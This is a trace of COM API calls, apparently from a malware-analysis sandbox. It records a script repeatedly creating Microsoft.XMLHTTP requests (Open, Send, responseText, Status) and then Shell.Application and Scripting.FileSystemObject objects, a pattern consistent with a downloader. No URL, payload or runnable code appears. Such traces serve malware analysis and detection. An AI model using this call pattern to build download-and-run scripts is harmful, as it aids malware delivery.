	[0458.151] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0458.151] longjmp () 
	[0458.152] longjmp () 
	[0458.152] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0458.152] SysStringLen (param_1=0x0) returned 0x0
	[0458.152] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0458.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0458.152] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0458.152] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0458.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0458.152] ??2@YAPEAX_K@Z () returned 0x62f310
	[0458.152] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0458.152] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0458.152] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0458.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0458.152] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0458.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0458.152] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0458.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0458.152] longjmp () 
	[0458.153] longjmp () 
	[0458.153] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0458.153] SysStringLen (param_1=0x0) returned 0x0
	[0458.153] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0458.153] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0458.153] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0458.153] ??2@YAPEAX_K@Z () returned 0x62f330
	[0458.153] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0458.153] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0458.153] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0458.153] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0458.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0458.154] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0458.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0459.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0459.414] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0459.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0459.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0459.414] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0459.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0459.414] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0459.415] SysStringLen (param_1=0x0) returned 0x0
	[0459.415] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0459.415] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0459.415] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0459.415] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0459.415] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0459.415] ??2@YAPEAX_K@Z () returned 0x62f350
	[0459.415] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0459.415] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0459.415] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0459.415] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0459.415] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0459.416] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0459.416] SysStringLen (param_1=0x0) returned 0x0
	[0459.416] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0459.419] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0459.419] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0459.420] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0459.420] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0459.420] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0459.420] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0460.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0460.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0460.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0460.522] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0460.522] SysStringLen (param_1=0x0) returned 0x0
	[0460.522] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0460.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0460.522] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0460.522] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0460.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0460.522] ??2@YAPEAX_K@Z () returned 0x62f330
	[0460.522] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0460.522] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0460.522] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0460.522] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0460.522] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0460.523] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0460.523] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0460.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0460.525] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0460.525] SysStringLen (param_1=0x0) returned 0x0
	[0460.525] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0460.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0460.525] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0460.525] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0460.525] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0460.526] ??2@YAPEAX_K@Z () returned 0x62f310
	[0460.526] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0460.526] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0460.526] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0460.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0460.526] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0460.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
